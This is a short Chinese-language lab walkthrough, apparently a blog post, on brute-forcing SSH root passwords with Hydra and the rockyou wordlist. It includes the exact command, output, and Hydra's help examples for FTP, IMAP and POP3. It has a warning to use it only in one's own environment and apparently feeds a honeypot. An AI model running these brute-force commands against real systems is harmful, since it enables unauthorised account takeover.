現場: Kali Linux 套件:hydra + rockyou 字典檔
警告:
這個LAB只能用在自己的環境下測試,
千萬不可以用在任何攻擊他人或者觸犯法律的行為上。
處理方式:
透過kali 自帶的字典檔來進行攻擊測試。
字典檔的位置/usr/share/wordlists/,他被封裝成一個.gz壓縮檔
我們來解開測試。
root@tkb-kali:~# gzip -d /usr/share/wordlists/rockyou.txt.gz
有了字典檔,我們就可以用他來進行攻擊的測試。
#hydra -s 62222 -v -l root -P /usr/share/wordlists/rockyou.txt <測試被攻擊的IP> ssh
(-s後面帶port 號,-v 表示秀出訊息,-l 表示使用帳號,-P後面帶字典檔,最
後是攻擊IP以及協定方式<這邊也可以用ssh://IP位址表示> )
#!##############
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use....
Hydra (http://www.thc.org/thc-hydra) starting at 2017-11-02 ...
[WARNING] Many SSH configurations limit the number o.....
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 l...
[DATA] attacking ssh://攻擊目標:62222/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported \
by ssh://root@攻擊目標:62222
[INFO] Successful, password authentication is supported \
by ssh://攻擊目標:62222
最後會跟你說預測時間要多久,但我們只是要取得數值而已。
[STATUS] 656.00 tries/min, 656 tries in 00:01h, 14343743 to do in 364:26h, 16 active
#!####################
所以這樣就夠了,之後我們到密罐中看看攻擊的情況。
可以看到前面的username是我們定義的那個樣子,而passoword欄位就是字典檔內的密碼字庫。
Hydra 還有很多種有去的攻擊組合方式,再請大家去查詢。
後記:
HYDRA 為支援的網路服務類型。
|
使用# hydra -h 也可以看到測試方法
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
(本篇完)
參考網址:
https://www.qa-knowhow.com/?p=2774
http://topspeedsnail.com/kydra-crack-ssh-and-avoid-attack/